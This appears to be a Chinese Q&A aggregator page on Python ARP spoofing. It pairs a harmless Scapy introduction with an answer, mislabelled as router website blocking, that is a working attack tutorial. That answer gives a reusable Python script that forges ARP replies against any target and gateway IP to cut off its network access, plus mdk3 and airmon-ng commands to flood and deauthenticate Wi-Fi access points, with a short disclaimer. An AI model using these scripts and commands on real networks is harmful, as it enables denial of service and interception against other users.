當前位置:首頁 » 編程語言 » pythonarp欺騙

pythonarp欺騙

發布時間: 2025-03-29 06:04:50

『壹』 網路工程師的python之路---Scapy基礎篇

本文是關於 Scapy 工具的基礎介紹與應用指南。Scapy 是一個使用 Python 編寫的互動式包處理程序,用戶可以利用它發送、嗅探、解析和偽造網路報文,用於網路探測、掃描和攻擊。它能夠處理多種網路協議,並支持創建工具進行網路分析、安全測試和研究。


Scapy 官方定義強調了它的強大功能,能夠構造網路攻擊腳本,如 SYN flooding、ARP 欺騙、DHCP 飢餓攻擊、DHCP rogue server 攻擊等。本篇分為基礎篇和應用篇,基礎篇將詳細介紹 Scapy 的基本應用,而應用篇將提供進一步的示例和實驗。


實驗環境與拓撲與之前的初級篇相同,包括使用 Windows 8.1 虛擬機上的 CentOS 7 系統、GNS3 中的思科三層交換機,以及特定的 IP 地址段和運行環境。實驗將指導讀者安裝 Scapy,通過命令進行交互操作,如構造和發送 IP、ARP 報文,以及使用 Scapy 的高級功能如 sr、srp 等。


實驗內容覆蓋從基本的 IP 報文構造和發送,到 ARP、ICMP、TCP 等網路協議的交互,以及如何使用 Scapy 進行網路嗅探和調試。實驗將逐步引導讀者理解 Scapy 的使用方式,從構造簡單的網路報文到更復雜的網路攻擊模擬。


實驗包括但不限於:



  • 使用 Scapy 構造並發送 IP 報文至指定目標。

  • 使用 Scapy 的 sendp() 函數構造並發送二層報文,如 ARP 報文。

  • 使用 Scapy 的 sr() 函數發送 ICMP 包並接收返回的響應。

  • 使用 Scapy 的 srp() 函數接收返回的二層報文。

  • 理解 TCP 報文的構造,以及如何使用 RandShort()、RandNum() 和 Fuzz() 函數生成隨機埠號。


通過這些實驗,讀者將獲得 Scapy 的實戰經驗,了解如何利用它進行網路分析和安全測試。實驗 1 至實驗 5 分別深入探討了基礎的網路報文構造與發送、ARP 報文的構造與接收、ICMP 報文的交互、二層報文的交互以及 TCP 報文的構造與隨機埠號的生成。


這些實驗提供了一個全面的 Scapy 學習路徑,從基礎操作到高級應用,幫助讀者逐步掌握 Scapy 的強大功能。通過實踐,讀者不僅能夠理解 Scapy 的使用方法,還能夠深入了解網路協議的工作原理,為網路安全測試和研究打下堅實的基礎。

『貳』 如何在路由器上屏蔽部分網址局部網路屏蔽

如何在路由器上屏蔽部分網址(局部網路屏蔽)
有線網路屏蔽
ARP官方釋意:地址解析協議,即ARP(AddressResolutionProtocol),是根據獲取的一個。發送信息時將包含目標IP地址的ARP請求廣播到區域網絡上的所有主機,並接收返回消息,以此確定目標的物理地址(MAC);收到返回消息後將該IP地址和物理地址存入本機ARP緩存中並保留一定時間,下次請求時直接查詢ARP緩存以節約資源。
實驗環境:
Linuxparrot(攻擊系統)
Linuxcentos(被攻擊系統)
實驗語言:python
Arp協議是網路不可缺少的一部分,由於arp協議存在一些不可修復的漏洞所以駭客也經常利用這個漏洞進行區域網攻擊。攻擊大致分為兩種。(1)純粹的網路攻擊,迫使受害者無法使用網路(2)目的性攻擊,arp欺騙獲取區域網使用者的信息,盜取賬號密碼等敏感信息。
筆者的電腦是接入寢室網路的,本來想使用真實電腦作為攻擊目標,鑒於室友正在使用,轉移到虛擬機進行實驗。
搭建實驗環境
Linuxparrot(攻擊系統)
Linuxcentos(被攻擊系統)
我們可以看到終端顯示的信息(網關一般是默認的)
攻擊系統IP:192.168.163.146MAC:00:0c:29:41:75:aa
被攻擊者IP:192.168.163.150MAC:00:0c:29:0b:09:89
網路測試依次使用兩台機器ping網路顯示信息如下
此信息說明可以連接外網,證明目前可以上網
使用攻擊系統掃描本網段的信息,使用到的工具fping
掃描到目標IP使用arp-a命令確認一下信息如下:
確認無誤,我的區域網中網關以2結尾,所以我們展開192.168.163.2和192.
168.163.150之間的攻擊。
使用python的scapy模塊,編寫對應的ARP包進行發送,由於scapy有獨立的交互模式,我們就直接在終端中進行編程。注意這里要進入root許可權
核心源代碼如下:
>>>a=ARP()
>>>a.show()
###[ARP]###
hwtype=0x1
ptype=IPv4
hwlen=None
plen=None
op=who-has
hwsrc=00:0c:29:41:75:aa
psrc=192.168.163.146
hwdst=00:00:00:00:00:00
pdst=0.0.0.0
>>>a.psrc='192.168.163.2'
>>>a.pdst='192.168.163.150'
>>>send(a,loop=1)
正在攻擊目標
驗證:
Ping網路沒有反應,網關mac地址也被修改為攻擊機的MAC地址
Python代碼:
fromscapy.allimport*
importtime
importrandom
pdst=str(input("目標IP:"))
gw=str(input("網關IP:"))
a=ARP()
a.pdst=pdst
a.psrc=gw
a.hwsrc='b4:1e:89:20:43:A1'
while1:
send(a,loop=0)
time.sleep(random.uniform(10,5))
無線網路屏蔽
無線網路攻擊相對上面的操作更加簡單,純工具攻擊方案。首先需要一個攻擊系統,我選用parrotsecurity系統,因為這個系統整合的工具比較全,現對於kali來說雖然沒有什麼較大的優勢但是他的UI界面做的相當的好。
插入無線網卡
可以看到無線網卡被命名為了wlan0(因為一般都是這樣命名的),使用airmon-ng將無線網專為mon模式,在這之前最好把網卡mac地址改變一下(我也不知道有什麼用總之這樣改感覺謹慎一些):
ifconfigwlan0down
Macchanger-mMACwlan0
ifconfgwlan0up
airmon-ngstartwlan0
接下來就可以使用wlan0mon進行無線網的查看了,記住名字已經變成wlan0mon了
使用airomp-ngwlan0mon或者wifete
打開就立刻掃到這兩個wifi,實驗目標是ruijie(傳說中的我打我自己,吐槽一下銳捷客戶端,不能開wifi就算了連虛擬機都不能用,讓計算機專業的學生怎麼搭建環境,雖然我不是計算機專業)。
直接開始攻擊mdk3wlan0mona-iMAC-s速率
從連接狀況可以看出來有大量的mac地址請求建立連接,當然我的手機已經沒網了,大概就是0-20秒網路變的卡頓,之後完全失去網路通訊,當然這只是一個AP的攻擊想要實現一定范圍的網路中斷其實也就是一個命令的事。mdk3wlan0mond-w白名單AP的mac-b黑名單AP的mac-c信道。回車鍵敲下去後果可想而知,網卡可能會壞掉哈哈…
這兩種攻擊方式有點不一樣,第一個是洪水攻擊利用大量的偽造mac迫使AP無法正常提供服務,第二種是直接進行解除認證。
Aircrack-ng套裝是專門針對無線的一套工具,mdk3是專用的攻擊工具,除了上面的案例還有許多可研究的使用方法。
總結:
兩種比較常見的區域網攻擊手段,單個拿出來看似確實沒什麼,但是兩個組合在一起完全可以製造一個網路屏蔽空間,對目標造成一定的危害,雖然是區域網,但也請不要隨意對他人使用,具體的防禦方法在其他的文章中也有講述,ARP攻防那篇文章有講到如何預防ARP攻擊,無線攻擊預防方案只能在路由中進行設置,有些到目前為止都還沒找到合適的防禦方案。

熱點內容
c語言的rand 發布:2025-03-31 22:35:43 瀏覽:721
python3下載教程 發布:2025-03-31 22:17:43 瀏覽:97
得物java 發布:2025-03-31 22:17:36 瀏覽:500
支票密碼器是什麼意思 發布:2025-03-31 22:11:12 瀏覽:11
文件存儲與資料庫存儲 發布:2025-03-31 22:09:32 瀏覽:759
怎麼解除開機密碼 發布:2025-03-31 22:09:32 瀏覽:953
own雲盤伺服器 發布:2025-03-31 22:09:27 瀏覽:284
我國新的預演算法 發布:2025-03-31 21:46:54 瀏覽:745
a演算法證明 發布:2025-03-31 21:44:28 瀏覽:779
c語言做貪吃蛇 發布:2025-03-31 21:44:22 瀏覽:808